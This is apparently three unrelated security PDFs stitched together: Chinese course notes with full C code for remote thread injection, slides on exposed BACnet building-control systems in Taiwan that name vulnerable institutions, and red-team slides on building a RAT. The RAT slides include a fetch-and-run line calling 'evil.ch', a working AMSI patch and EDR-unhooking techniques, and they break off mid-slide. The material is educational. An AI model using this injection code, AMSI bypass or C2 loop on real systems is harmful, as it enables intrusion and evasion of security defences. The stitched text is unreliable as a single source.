代码,我们能看见汇编代码是因为VC6的反汇编引擎将机器码转为汇编代码:
所以我们拷贝过去的应该是机器码。
31.1.2 前提条件
如下图所示,之间通过硬编码地址调用的机器码就没法注入执行,因为目标进程不可能会有目标地址内存给你
进行使用:
滴水逆向课程笔记 – Win32
注入代码 – 164
1.
2.
3.
4.
31.2 复制代码的编写原则
不能有全局变量
不能使用常量字符串
不能使用系统调用
不能嵌套调用其他函数
31.3 传递参数
有这么多限制该怎么办?假设我们要将代码进程的代码拷贝过去,这段代码的作用就是创建文件,那么它得流
程可以如下图所示:
首先将代码进程的ThreadProc复制过去,然后将复制过去之后目标进程的地址给到CreateRemoteThread函
数,这样就解决了自定义函数的问题;
其次我们要创建文件的话就必须要使用CreateFile函数,我们不能直接这样写,因为它依赖当前进程的导入
表,当前进程和目标进程导入表的地址肯定是不一样的,所以不符合复制代码的编写原则;所以我们可以通过
线程函数的参数来解决,我们先将所有用到的目标参数写到一个结构体中复制到目标进程,然后将目标进程结
构体的地址作为线程函数的参数。
滴水逆向课程笔记 – Win32
注入代码 – 165
31.3.1 代码实现
如下是传递参数进行远程注入代码的实现:
滴水逆向课程笔记 – Win32
注入代码 – 166
#include <tlhelp32.h>
1
#include <stdio.h>
2
#include <windows.h>
3
4
typedef struct {
5
DWORD dwCreateAPIAddr; // Createfile函数的地址
6
LPCTSTR lpFileName; // 下面都是CreateFile所需要用到的参数
7
DWORD dwDesiredAccess;
8
DWORD dwShareMode;
9
LPSECURITY_ATTRIBUTES lpSecurityAttributes;
10
DWORD dwCreationDisposition;
11
DWORD dwFlagsAndAttributes;
12
HANDLE hTemplateFile;
13
} CREATEFILE_PARAM;
14
15
// 定义一个函数指针
16
typedef HANDLE(WINAPI* PFN_CreateFile) (
17
LPCTSTR lpFileName,
18
DWORD dwDesiredAccess,
19
DWORD dwShareMode,
20
LPSECURITY_ATTRIBUTES lpSecurityAttributes,
21
DWORD dwCreationDisposition,
22
DWORD dwFlagsAndAttributes,
23
HANDLE hTemplateFile
24
);
25
26
// 编写要复制到目标进程的函数
27
DWORD _stdcall CreateFileThreadProc(LPVOID lparam)
28
{
29
CREATEFILE_PARAM* Gcreate = (CREATEFILE_PARAM*)lparam;
30
PFN_CreateFile pfnCreateFile;
31
pfnCreateFile = (PFN_CreateFile)Gcreate->dwCreateAPIAddr;
32
33
// creatFile结构体全部参数
34
pfnCreateFile(
35
Gcreate->lpFileName,
36
Gcreate->dwDesiredAccess,
37
Gcreate->dwShareMode,
38
Gcreate->lpSecurityAttributes,
39
Gcreate->dwCreationDisposition,
40
Gcreate->dwFlagsAndAttributes,
41
Gcreate->hTemplateFile
42
);
43
44
return 0;
45
}
46
47
// 远程创建文件
48
BOOL RemotCreateFile(DWORD dwProcessID, char* szFilePathName)
49
{
50
BOOL bRet;
51
DWORD dwThread;
52
HANDLE hProcess;
53
HANDLE hThread;
54
DWORD dwThreadFunSize;
55
滴水逆向课程笔记 – Win32
注入代码 – 167
CREATEFILE_PARAM GCreateFile;
56
LPVOID lpFilePathName;
57
LPVOID lpRemotThreadAddr;
58
LPVOID lpFileParamAddr;
59
DWORD dwFunAddr;
60
HMODULE hModule;
61
62
63
bRet = 0;
64
hProcess = 0;
65
dwThreadFunSize = 0x400;
66
// 1. 获取进程的句柄
67
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);
68
if (hProcess == NULL)
69
{
70
OutputDebugString("OpenProcessError! \n");
71
return FALSE;
72
}
73
// 2. 分配3段内存:存储参数,线程函数,文件名
74
75
// 2.1 用来存储文件名 +1是要计算到结尾处
76
lpFilePathName = VirtualAllocEx(hProcess, NULL, strlen(szFilePathName)+1, MEM_COMMIT,
PAGE_READWRITE); // 在指定的进程中分配内存
77
78
// 2.2 用来存储线程函数
79
lpRemotThreadAddr = VirtualAllocEx(hProcess, NULL, dwThreadFunSize, MEM_COMMIT,
PAGE_READWRITE); // 在指定的进程中分配内存
80
81
// 2.3 用来存储文件参数
82
lpFileParamAddr = VirtualAllocEx(hProcess, NULL, sizeof(CREATEFILE_PARAM), MEM_COMMIT,
PAGE_READWRITE); // 在指定的进程中分配内存
83
84
85
// 3. 初始化CreateFile参数
86
GCreateFile.dwDesiredAccess = GENERIC_READ | GENERIC_WRITE;
87
GCreateFile.dwShareMode = 0;
88
GCreateFile.lpSecurityAttributes = NULL;
89
GCreateFile.dwCreationDisposition = OPEN_ALWAYS;
90
GCreateFile.dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL;
91
GCreateFile.hTemplateFile = NULL;
92
93
// 4. 获取CreateFile的地址
94
// 因为每个进程中的LoadLibrary函数都在Kernel32.dll中,而且此dll的物理页是共享的,所以我们进程中获得的
LoadLibrary地址和别的进程都是一样的
95
hModule = GetModuleHandle("kernel32.dll");
96
GCreateFile.dwCreateAPIAddr = (DWORD)GetProcAddress(hModule, "CreateFileA");
97
FreeLibrary(hModule);
98
99
// 5. 初始化CreatFile文件名
100
GCreateFile.lpFileName = (LPCTSTR)lpFilePathName;
101
102
// 6. 修改线程函数起始地址
103
dwFunAddr = (DWORD)CreateFileThreadProc;
104
// 间接跳
105
if (*((BYTE*)dwFunAddr) == 0xE9)
106
{
107
滴水逆向课程笔记 – Win32
注入代码 – 168
dwFunAddr = dwFunAddr + 5 + *(DWORD*)(dwFunAddr + 1);
108
}
109
110
// 7. 开始复制
111
// 7.1 拷贝文件名
112
WriteProcessMemory(hProcess, lpFilePathName, szFilePathName, strlen(szFilePathName) + 1, 0);
113
114
// 7.2 拷贝线程函数
115
WriteProcessMemory(hProcess, lpRemotThreadAddr, (LPVOID)dwFunAddr, dwThreadFunSize, 0);
116
117
// 7.3 拷贝参数
118
WriteProcessMemory(hProcess, lpFileParamAddr, &GCreateFile, sizeof(CREATEFILE_PARAM), 0);
119
120
// 8. 创建远程线程
121
hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpRemotThreadAddr,
lpFileParamAddr, 0, &dwThread);// lpAllocAddr传给线程函数的参数.因为dll名字分配在内存中
122
if (hThread == NULL)
123
{
124
OutputDebugString("CreateRemoteThread Error! \n");
125
CloseHandle(hProcess);
126
CloseHandle(hModule);
127
return FALSE;
128
}
129
130
// 9. 关闭资源
131
CloseHandle(hProcess);
132
CloseHandle(hThread);
133
CloseHandle(hModule);
134
return TRUE;
135
136
}
137
138
// 根据进程名称获取进程ID
139
DWORD GetPID(char *szName)
140
{
141
HANDLE hProcessSnapShot = NULL;
142
PROCESSENTRY32 pe32 = {0};
143
144
hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
145
if (hProcessSnapShot == (HANDLE)-1)
146
{
147
return 0;
148
}
149
150
pe32.dwSize = sizeof(PROCESSENTRY32);
151
if (Process32First(hProcessSnapShot, &pe32))
152
{
153
do {
154
if (!strcmp(szName, pe32.szExeFile)) {
155
return (int)pe32.th32ProcessID;
156
}
157
} while (Process32Next(hProcessSnapShot, &pe32));
158
}
159
else
160
{
161
CloseHandle(hProcessSnapShot);
162
滴水逆向课程笔记 – Win32
注入代码 – 169
}
163
return 0;
164
}
165
166
int main()
167
{
168
RemotCreateFile(GetPID("进程名"), "文件名");
169
return 0;
170
}
171 | pdf |
Stephen Hilt, miaoski
2015/8/26-27
Building Automation and Control –
Hacking Subsidized Energy Saving System
1
$ whoami
• miaoski (@miaoski)
• Staff engineer in Trend Micro
• BACnet newbie
2
$ whoami
• Stephen Hilt (@tothehilt)
• Senior threat researcher, Trend Micro
• 10 years ICS security exp
3
Disclaimer
• Do not probe / scan / modify the devices that you don’t own.
• Do not change any value without permission.
• It’s a matter of LIFE AND DEATH.
• Beware! Taiwanese CRIMINAL LAW.
4
Photo courtesy of
Wikimedia, CC0.
BACnet –
Building Automation and Control networks
5
BACnet was designed to allow communication of building automation and control
systems for applications such as heating, ventilating, and air-conditioning control,
lighting control, access control, and fire detection systems and their associated
equipment. http://en.wikipedia.org/wiki/BACnet
Building Automation?
6
Image from http://buildipedia.com/aec-pros/facilities-ops-maintenance/case-study-
cuyahoga-metro-housing-authority-utilizes-bas
Credit: Siemens Building Technologies
Building Automation!
7
Photo courtesy of Chien Kuo Senior High School.
ANSI/ASHRAE 135-2001
8
ICS Protocols
9
•
ICS – Industrial Control
Systems
•
SCADA – Supervisory
Control and Data
Acquisition
•
DCS – Distributed
Control Systems
(Most) ICS Protocols
10
Authentication
Encryption
Data Integrity
Homemade BACnet
11
http://bacnet.sourceforge.net/
BACnet Layers map to OSI
12
Credit: icpdas.com
BACnet/IP
13
BACnet/IP = UDP + BVLL + NPDU + APDU + …
14
Charts courtesy of http://www.bacnet.org/Tutorial/BACnetIP/default.html
BACnet/IP = UDP + BVLL + NPDU + APDU + …
15
Charts courtesy of http://www.bacnet.org/Tutorial/BACnetIP/default.html
BBMD = BACnet broadcast management device
BACnet Objects
16
Credit: www.bacnet.org
BACnet-discover-enumerate.nse (1)
17
Object Name Packet Sent == 810a001101040005010c0c023FFFFF194d
77 == 0x4d
Source: ANSI/ASHRAE Standard 135-2001
Source code:
https://github.com/digitalbond/Redpoint/blob/master/BACnet-discover-enumerate.nse
BACnet-discover-enumerate.nse (2)
• Other Read Properties To Try
– 810a001101040005010c0c023FFFFF19xx
• Vendor ID: 120 (0x78)
• Description: 28 (0x1c)
• Firmware: 44 (0x2c)
• Application Software: 12 (0x0c)
• Model Name: 70 (0x46)
• Location: 58 (0x3a)
• Object Identifier: 75 (0x4b)
18
Source code:
https://github.com/digitalbond/Redpoint/blob/master/BACnet-discover-enumerate.nse
BACnet-discover-enumerate.nse (3)
19
| Vendor ID:
| Object-identifier:
| Firmware:
| Application Software:
| Object Name:
| Model Name:
| Location:
| Broadcast Distribution Table (BDT):
|_ Foreign Device Table (FDT): Empty Table
Vendor ID: A registered BACnet
Vendor
Object-identifier: unique
identifier of the device. If the
Object-Identifier is known, it is
possible to send commands with
BACnet client software, including
those that change values,
programs, schedules, and other
operational information on BACnet
devices.
# nmap --script BACnet-discover-enumerate.nse -sU -p 47808 140.xx.xx.xx
BACnet-discover-enumerate.nse (3)
20
| Vendor ID:
| Object-identifier:
| Firmware:
| Application Software:
| Object Name:
| Model Name:
| Location:
| Broadcast Distribution Table (BDT):
|_ Foreign Device Table (FDT): Empty Table
Broadcast Distribution Table
(BDT) : A list of the BACnet
Broadcast Management Devices
(BBMD) in the BACnet network.
This will identify all of the subnets
that are part of the BACnet
network.
Foreign Device Table (FDT): A
list of foreign devices registered
with the BACnet device. A foreign
device is any device that is not on
a subnet that is part of the BACnet
network, not in the BDT. Foreign
devices often are located on
external networks and could be an
attacker's IP address.
Map Out Connections
21
Nmap scan report for 140-xxx-xxx-xxx.n**k.edu.tw (140.xxx.xxx.xxx)
Host is up (0.00050s latency).
PORT STATE SERVICE
47808/udp open BACNet -- Building Automation and Control Networks
| bacnet-info:
| Vendor ID: Siemens Schweiz AG (Formerly: Landis & Staefa Division Europe) (7)
| Vendor Name: Siemens Building Technologies Inc.
| Object-identifier: 0
| Firmware: 3.7
| Application Software: INT0370
| Object Name: 25OC0001874
| Model Name: Insight
| Description: BACnet Device
| Location: PC
| Broadcast Distribution Table (BDT):
| 140.xxx.xxx.xxx:47808
| 140.xxx.xxx.xxx:47808
| 172.18.9.254:47808
|_ Foreign Device Table (FDT): Non-Acknowledgement (NAK)
FDT NAK!
22
Nmap scan report for 140-xxx-xxx-xxx.n**k.edu.tw (140.xxx.xxx.xxx)
Host is up (0.00050s latency).
PORT STATE SERVICE
47808/udp open BACNet -- Building Automation and Control Networks
| bacnet-info:
| Vendor ID: Siemens Schweiz AG (Formerly: Landis & Staefa Division Europe) (7)
| Vendor Name: Siemens Building Technologies Inc.
| Object-identifier: 0
| Firmware: 3.7
| Application Software: INT0370
| Object Name: 25OC0001874
| Model Name: Insight
| Description: BACnet Device
| Location: PC
| Broadcast Distribution Table (BDT):
| 140.xxx.xxx.xxx:47808
| 140.xxx.xxx.xxx:47808
| 172.18.9.254:47808
|_ Foreign Device Table (FDT): Non-Acknowledgement (NAK)
Let’s Gather MORE Information
• Systems Require you to Join the Network as a Foreign Device
to Enumerate Devices that are attached, as well as points
– Once Registered in FDT, perform a Who-is message
– Parse I-Am responses
– …
– Profit?
23
BACnet Discovery Tool (BDT)
24
View Connected Inputs
25
26
Another day.
Today we look for BACnet devices.
Shodan + BACnet Discovery Tool
27
BACnet port = 0xBAC0 = port 47808
Country: TW
• As of July 29, 2015
• 48 BACnet devices
– 14 Advantech / BroadWin WebAccess Bacnet Server 7.0
– 4 Automated Logic LGR
– 3 Carel S.p.A. pCOWeb
– 2 TAC MNB-1000
– 1 Siemens Insight
• 59 Ethernet/IP
• 23 Moxa Nport Ethernet-RS485 in N**U
28
14 Advantech/BroadWin WebAccess
29
• CVE-2011-4522 XSS in bwerrdn.asp
• CVE-2011-4523 XSS in bwview.asp
• CVE-2011-4524 Long string REC
• CVE-2011-4526 ActiveX buffer overflow
• CVE-2012-0233 XSS of malformed URL
• CVE-2012-0234 SQL injection
• CVE-2012-0236 CSRF (Cross-site report forgery)
• CVE-2012-0237 Unauthorized modification
• CVE-2012-0238 opcImg.asp stack overflow REC
• CVE-2012-0239 Authentication vulnerability (still in 7.0)
• CVE-2012-0240 Authentication vulnerability in GbScriptAddUp.asp
• CVE-2012-0241 Arbitrary memory corruption
• CVE-2012-0242 Format string exploit
• CVE-2012-0243 ActiveX buffer overflow in bwocxrun.ocx
• CVE-2012-0244 SQL injection
11 Protected by Password
30
Kenting Caesar Park Hotel 墾丁凱撒大飯店
11 Protected by Password
31
Chung Hua University 中華大學
11 Protected by Password
32
Dorm, Chung Yuan Christian University 中原大學宿舍
11 Protected by Password
33
Hydean Biotechnology Co., Ltd. 瀚頂生物科技
3 No or Default Password
34
Underground Driveway, ** Road ***車行地下道
Unprotected HMI
35
Unprotected HMI
36
Unprotected HMI
37
Project Management
38
Analog Input Parameters
39
PLC Binary Value
40
Parameter Update
41
Main Graph
42
Turn Off the Aircon and Go Home?
43
Life Is Harder without HMI, But ...
• Trane 2.6.30_HwVer12AB-hydra
• P******* Co., New Taipei City
44
Device 11021 / 11022
45
Analog Inputs
46
Output = Modifiable
47
4 Automated Logic ME-LGR
48
3 Carel pCOWeb
49
2 TAC-MNB
50
Siemens Insight
51
Other than BACnet
• 59 Ethernet/IP in TW
– N**U Library
– N**U Bio Center
– N**U Men’s Dormitory
– N**U Management Division
– ... and so on
• ModBus/TCP
• Simple Ethernet-RS422/485 Adapters
– 23 Moxa NPort in N**U
52
Allen-Bradley Powermonitor 1000
53
Unprotected HMI of Powermonitor 1000
54
Force KYZ
55
KYZ Pulse
56
Circuit courtesy of http://solidstateinstruments.com/newsletters/kyz-pulses.php
Energy Results
57
Voltage Monitor
58
23 Moxa Nport Ethernet-RS485 in N**U
59
Unprotected NPort
60
•
23 NPort in N**U
•
12 firewalled
•
2 password protected
•
9 no password
Dump and Have Fun
61
Legacy Devices (Osaki PowerMax 22)
62
Legacy Devices (Osaki PowerMax 22)
63
Special thanks to
Chien Kuo Senior
High School.
Subsidies from Ministry of Education
64
MOE subsidies ~25,000 USD to schools for,
•
Power consumption management system
•
Building energies management system
•
Improvement of air-condition controls
National Chia-Yi University
65
Contract capacity: 4,700kW
Peak capacity: 5,216kW
Minimum capacity: 2,752 kW
NTU’s Discussion about BACnet
66
Shu-Zen Junior College
67
Taitung Senior Commercial Vocational School
68
St. Mary’s Junior College of Medicine
69
Points in Common
• Subsidized
• Public Tender
• Contracted
Note
You can find the papers on Google.
We did not probe / test their devices.
70
Suggestions
• Password
• Use private IP. No, not corporate LAN
• Firewall, SDN or tagged VLAN
• Upgrade / Patch
• Contract with a pentester
71
Port 47808, TW: 57/12,358
72
Home Automation with Arduino & RPi
73
Project at http://www.instructables.com/id/Uber-Home-Automation-w-Arduino-Pi/
Control System on Your Hand
74
Homepage of http://bacmove.com
Our suggestion:
These things shouldn't even be on the internet, not on the corporate network.
It’s a control system and should be treated as such.
Questions?
75
TAC-MNB Module
76
77
Automated Logic
US$40 (used)
|
US$2,500 (new)
78
MOXA NPort 5130
US$75 - 149 (new)
Carel pCO1000 US$200
pCOWEB, unknown
MNB-1000 US$321.60 | pdf |
1
RAT Development
06/01/2022
Develop
your own
RAT
EDR & AV Defense
Dobin Rutishauser
@dobinrutis
https://bit.ly/3Qg219P
2
RAT Development
06/01/2022
Developer // TerreActive
Pentester // Compass Security
Developer // UZH
SOC Analyst // Infoguard
RedTeam Lead // Raiffeisen
About
SSL/TLS Recommendations
// OWASP Switzerland
Burp Sentinel - Semi Automated Web Scanner
// BSides Vienna
Automated WAF Testing and XSS Detection
// OWASP Switzerland Barcamp
Fuzzing For Worms - AFL For Network Servers
// Area 41
Memory Corruption Exploits & Mitigation
// BFH Berner Fachhochschule
Gaining Access
// OST Ostschweizer Fachhochschule
3
RAT Development
06/01/2022
Red Teaming / Scope
RAT Development
EDR & AV Defense
Conclusion
Diving into the code, 17min
Background, 5min
Bypass all the things, 17min
What does it all mean, 6min
01
02
03
04
4
RAT Development
06/01/2022
Develop
your own
RAT
Red Teaming
5
RAT Development
06/01/2022
Red Teaming
Red Teaming realistically tests overall security posture
●
Not pentest!
●
Simulate certain types of adversaries (CTI)
●
Focus on TTP’s (Tools, Techniques, Procedures)
●
Not so much focus on vulnerabilities
●
Credential stealing, lateral movement, data exfiltration
●
Testing the BlueTeam / SOC
●
PurpleTeaming
(See talk “Building a Red Team” yesterday by Daniel Fabian)
6
RAT Development
06/01/2022
Client
Workstation
HTTP Server
HTTP Proxy
Antivirus
EDR
Sysmon
SIEM/SOAR
Antivirus
Sandbox
Domain Reputation
Content Filter
●
No admin privileges
●
There’s a SOC
●
Internet only via
authenticated HTTP
proxy
Target Security, Products
7
RAT Development
06/01/2022
Windows Client
What is a RAT?
RAT.exe
Remote Access Tool
Client
Beacon
Implant
C2
https://dobin.ch
Command & Control
8
RAT Development
06/01/2022
https://www.microsoftpressstore.com/articles/article.aspx?p=2992603
Killchain
9
RAT Development
06/01/2022
Everyone uses CobaltStrike
Everyone detects CobaltStrike
Writing a RAT yourself may solve
some of your problems?
Why write a RAT?
10
RAT Development
06/01/2022
Windows Client
What is a RAT?
RAT.exe
Windows
Client
Server
In Scope:
Execute RAT
Execute Tools
Not In Scope:
Recon
Exploit
Lateral movement
Privilege escalation
(attacking)
11
RAT Development
06/01/2022
Develop
your own
RAT
RAT
Development
Keep It Simple, Stupid
12
RAT Development
06/01/2022
while True:
curl evil.ch/getCommand > exec && ./exec
Your first RAT
13
RAT Development
06/01/2022
Antnium
“Anti-Tanium” (now also Anti-Defender)
github.com/dobin/antnium (300+ commits)
github.com/dobin/antnium-ui (200+ commits)
Antnium
14
RAT Development
06/01/2022
Programming languages:
●
Now native:
○
C, C++, NIM, Zig
○
Go, Rust, Hare
●
Before “managed”:
○
Powershell, C#
(Go) features:
●
Compiled
●
Garbage collection yay
●
Cross compiling (Win, Linux)
●
Reasonably big RedTeaming
ecosystem
●
Can compile as DLL
Choosing a programming language
15
RAT Development
06/01/2022
Use HTTPS as communication channel
●
Simple
●
Reliable
●
Always available
●
Hard to monitor
●
Just need two endpoints:
○
/getCommand
○
/sendAnswer
●
(C2 obfuscation not in scope here)
Communication channel
16
RAT Development
06/01/2022
HTTP communication channel
C2
Go
RAT
Go
Operator UI
Angular
DB
17
RAT Development
06/01/2022
HTTP communication channel
C2
RAT
Operator
UI
DB
ClientId
PacketId
Arguments
Response
42
1
Cmd: hostname
client
42
2
Cmd: whoami
c2.ch/get/42
add
c2.ch/put/2
18
RAT Development
06/01/2022
type Packet struct {
ClientId string
PacketId string
PacketType string
Arguments map[string]string
Response map[string]string
DownstreamId string
}
"Packet": {
"clientid": "c88ld5qsdke1on40m5a0",
"packetid": "59650232820019",
"packetType": "exec",
"arguments": {
"commandline": "hostname",
"shelltype": "cmd",
},
"response": {},
"downstreamId": "client"
},
Packet structure
19
RAT Development
06/01/2022
Demo: HTTP
ID: T1071.001: Command and Control: Web Protocols
ID: T1132.001: Command and Control: Standard Encoding
ID: T1573.001: Command and Control: Encrypted Channel, Symmetric Encryption
ID: T1090.002: Command and Control: External Proxy
20
RAT Development
06/01/2022
C2 Server
RAT
Forwarder
@ EC2
c2.shop.ch
RAT
Forwarder
@ GCP
c2.bank.ch
C2 Server
UI
Reverse
Proxy
ClientKey
ClientKey
GIT
UI
C2 Infrastructre Architecture
Trusted
21
RAT Development
06/01/2022
c := Campaign {
ApiKey: "secretKeyOperator",
EncKey: "secretKeyClient"
ServerUrl: "c2.notavirus.ch",
PacketSendPath: "/send",
PacketGetPath: "/get/",
FileUploadPath: "/upload/",
FileDownloadPath: "/static/",
ClientWebsocketPath: "/ws",
AuthHeader: "X-Session-Token",
UserAgent: "Go-http-client/1.1",
}
Campaign Config
22
RAT Development
06/01/2022
Websocket Communication Channel
C2
RAT
Operator
UI
DB
Websocket:
●
Instant
●
Stealthy
Websocket
Websocket
23
RAT Development
06/01/2022
Demo: Websockets
ID T1008: Command and Control: Fallback Channels
ID: T1059.001 Execution: Command and Scripting Interpreter: Powershell
ID: T1059.003 Execution: Command and Scripting Interpreter: Windows Command Shell0
24
RAT Development
06/01/2022
Websocket Communication Channel
C2
DB
Dev Problems with Websockets:
●
Architecture is upside down
●
Clients are online / offline
●
Client needs to handle disconnects
○
Reconnects
○
Downgrades
○
Upgrades
●
Goroutines + Channels en masse
Thread
Blocking
send
25
RAT Development
06/01/2022
Server Architecture
26
RAT Development
06/01/2022
RAT’s need to execute commands
●
net.exe, ipconfig, wmic, and other lolbins
●
cmd.exe / powershell.exe command lines
●
Maybe have a persistent shell too
Command Execution
27
RAT Development
06/01/2022
Demo: Command Execution
ID: T1059.001 Execution: Command and Scripting Interpreter: Powershell
ID: T1059.003 Execution: Command and Scripting Interpreter: Windows Command Shell
28
RAT Development
06/01/2022
Dev problems with execution
arguments:
●
commandline = “net user dobin”
●
commandline = []string{“net”, “user”, “dobin”}
●
commandline = “c:\program files\test.exe”
●
Cmd.exe is different…
And:
●
Capturing Stdout/Stderr
●
Managing long lasting processes
Demo: Command Execution
29
RAT Development
06/01/2022
UI/UX
●
Intuitive
●
Reliable
●
Effective
●
Every feature in the RAT needs UI!
Dev Problems: SPA
●
Angular, TypeScript
●
RXJS
●
Re-implement most of the server again
○
Managing stream of packets
UI/UX
C2
Angular UI
Stream of packets
+ notifications
Clients
Packets
Files
State
30
RAT Development
06/01/2022
Demo: File Browser, Upload, Download
ID T1105: Command and Control: Ingress Tool Transfer
ID T1020: Exfiltration: Automated Exfiltration
ID T1048.001: Exfiltration: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
31
RAT Development
06/01/2022
Demo: Downstream / Wingman
32
RAT Development
06/01/2022
Making it reliable and robust with tests
●
Unittests
●
Integration Tests
●
REST Tests, Websocket Tests
●
Client->Server Tests, Server->Client Tests
●
Refactoring
But especially:
●
Reconnection Tests
●
Proxy Tests
●
Command Execution Tests
Reliability and Robustness
33
RAT Development
06/01/2022
# Test doing 80% code coverage
s := Server()
c := Client()
s.adminChannel <- cmdWhoami
go s.start()
go c.start()
packet <- s.incomingPacket
assert(packet.response[“output”]
== “dobin”)
# Test reconnection (cont.)
s.shutdown()
s := Server()
go s.start()
s.adminChannel <- cmdWhoami
packet <- s.incomingPacket
assert(packet.response[“output”]
== “dobin”)
Tests
34
RAT Development
06/01/2022
Develop
your own
RAT
Antivirus
Evasion
35
RAT Development
06/01/2022
Import
Table
File
Code
Data
Signature
Scanning
Heuristics
Import
Table
Process
Code
Data
AMSI
Real-time scanner
For .NET,
Powershell
Sandbox
AV components
36
RAT Development
06/01/2022
[INFO ][reducer.py: 58] scanSection() :: Result: 1157277-1157322 (45 bytes)
65 6E 67 65 00 02 00 49 5F 4E 65 74 53 65 72 76 enge...I_NetServ
65 72 54 72 75 73 74 50 61 73 73 77 6F 72 64 73 erTrustPasswords
47 65 74 00 00 00 00 49 5F 4E 65 74 53 Get....I_NetS
[INFO ][reducer.py: 58] scanSection() :: Result: 1158195-1158207 (12 bytes)
00 38 01 47 65 74 43 6F 6E 73 6F 6C .8.GetConsol
[INFO ][reducer.py: 58] scanSection() :: Result: 1158207-1158251 (44 bytes)
65 4F 75 74 70 75 74 43 50 00 00 09 03 53 65 74 eOutputCP....Set
43 6F 6E 73 6F 6C 65 4F 75 74 70 75 74 43 50 00 ConsoleOutputCP.
00 6C 00 43 72 65 61 74 65 50 72 6F .l.CreatePro
Antivirus: Signature Scanning (avred)
37
RAT Development
06/01/2022
Antivirus: Heuristics (PEStudio)
38
RAT Development
06/01/2022
PS E:\> copy .\PowerView.ps1 .\PowerView2.ps1
PS E:\> . .\PowerView2.ps1
At E:\PowerView2.ps1:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
This script contains malicious
content and has been blocked by
your antivirus software.
AMSI - detect on-load
39
RAT Development
06/01/2022
When developing your own RAT:
●
Signature scanning:
○
No signatures :-) (FUD)
●
Heuristics
○
Dont import too much functionality into the RAT
○
Or: Dynamic imports, D/Invoke
○
Generally not a problem
●
Sandbox
○
RAT doesnt do anything except waiting for commands
○
Detect sandbox and exit
○
Calculate some primes…
○
Generally not a problem
●
AMSI
○
Not applicable, as not .NET/Powershell
Defeating the AV
40
RAT Development
06/01/2022
Develop
your own
RAT
execute
your tools
41
RAT Development
06/01/2022
List of Red Team tools
PE EXE/DLL, unmanaged
●
Mimikatz
●
Dumpert
.NET/C#, managed code
●
Rubeus
●
Seatbelt
●
SharpHound
●
SharpSploit
●
SharpUp
●
SharpView
Powershell:
●
ADRecon
●
PowerSploit (obsolete)
●
Load .NET in process
●
AMSI Pypass
●
Obfuscation + download
●
Reflective PE loader
●
Process injection shellcode
●
Obfuscation
●
AMSI bypass: amsi.fail
42
RAT Development
06/01/2022
CLRCreateInstance(CLSID_CLRMetaHost,
IID_ICLRMetaHost, (LPVOID*)&metaHost);
metaHost->GetRuntime(L"v4.0.30319",
IID_ICLRRuntimeInfo, (LPVOID*)&runtimeInfo);
runtimeInfo->GetInterface(
CLSID_CLRRuntimeHost, IID_ICLRRuntimeHost,
(LPVOID*)&runtimeHost);
runtimeHost->Start();
HRESULT res = runtimeHost-> ExecuteInDefaultAppDomain(
L"C:\\labs\\bin\\Debug\\CLRHello1.exe",
L"CLRHello1.Program", L"spotlessMethod",
L"test", &pReturnValue);
Loading managed code
Code
.NET Runtime
AMSI.dll
Process
Executing Managed Code (.NET / Powershell bytecode)
exec
scan
43
RAT Development
06/01/2022
$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress(
$LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address,5,0x40,[ref]$p)
$Patch = (0xB8,0x57,0x00,0x07,0x80,0xC3)
[System.Runtime.InteropServices.Marshal]::Copy(
$Patch, 0, $Address, 6)
Patch AMSI
Code
.NET Runtime
AMSI.dll
Process
AMSI Patch
exec
44
RAT Development
06/01/2022
AV/EDR uses UMH (Usermode Hooks)
●
Map a DLL in each process
●
Patch ntdll.dll to jump first to the av.dll
●
Av.dll scores invocations of potentially malicious
library calls
○
LoadLibrary(), GetProcaddress(),
VirtualProtect()
●
Kill process if it looks malicious
Code
.NET Runtime
AMSI.dll
Process
ntdll.dll
av.dll
Usermode hooks
45
RAT Development
06/01/2022
Kernel32.dll
NTDLL.DLL
Syscall
CreateProcessA()
VirtualAlloc()
WriteProcessMemory()
Usermode Hooks
46
RAT Development
06/01/2022
Kernel32.dll
NTDLL.DLL (Patched, UMH)
Syscall
CreateProcessA()
VirtualAlloc()
WriteProcessMemory()
AV.dll
Usermode Hooks
●
Map a DLL in each process
●
Patch ntdll.dll to jump first to the av.dll
●
Av.dll scores invocations
●
Kill process if it looks malicious
47
RAT Development
06/01/2022
Kernel32.dll
NTDLL.DLL (Un-Patched)
Syscall
CreateProcessA()
VirtualAlloc()
WriteProcessMemory()
AV.dll
Usermode Hooks
●
Restore ntdll.dll from disk
●
Uses
○
VirtualAlloc,
WriteProcessMemory
48
RAT Development
06/01/2022
Kernel32.dll
NTDLL.DLL (Un-Patched)
Syscall
CreateProcessA()
VirtualAlloc()
WriteProcessMemory()
AV.dll
Usermode Hooks
●
Restore ntdll.dll from disk
○
Using direct syscalls
49
RAT Development
06/01/2022
To execute managed code:
●
Patch AMSI
○
So our .NET tools dont get detected
○
(AMSI-patch technique)
●
Patch NTDLL.dll
○
So our “Patch AMSI” does not get detected
○
(Reflexxion technique)
●
Using direct syscalls
○
So our “Patch NTDLL.dll” does not get detected
○
(Syswhisper technique)
●
(Obfuscate direct syscall invocation)
Executing managed code technique
Donut + Reflexxion
50
RAT Development
06/01/2022
Demo: Remote .NET execution
ID: T1055: Process Injection
ID: T1620: Reflective Code Loading
ID: T1106: Native API
51
RAT Development
06/01/2022
Develop
your own
RAT
EDR
Evasion
52
RAT Development
06/01/2022
SOC - Security Operations Center
aka Blue Team, aka CDC, aka D&R (Detection & Response)
SOC
53
RAT Development
06/01/2022
Monitor endpoint
Collect alarms (e.g. from AV’s)
Collect events (e.g. from sysmon or EDR agents)
●
Rule based detection (e.g. lolbins)
●
AI based detection
Dispatch to Analysts
EDRs
54
RAT Development
06/01/2022
Steahlthily execute a EXE
●
As genuine, non-malicious process
●
Basically EXE path spoofing
Process hollowing:
●
“Fancy” process injection
●
Start a non-malicious process
●
Replace its content with another EXE/PE
●
Resume process
Process hollowing
55
RAT Development
06/01/2022
Process injection:
●
OpenProcess to get the process information
●
VirtualAllocEx to allocate some memory inside the process for the shellcode
●
WriteProcessMemory to write the shellcode inside this space
●
CreateRemoteThread to tell the process to run the shellcode with a new thread
Process hollowing:
●
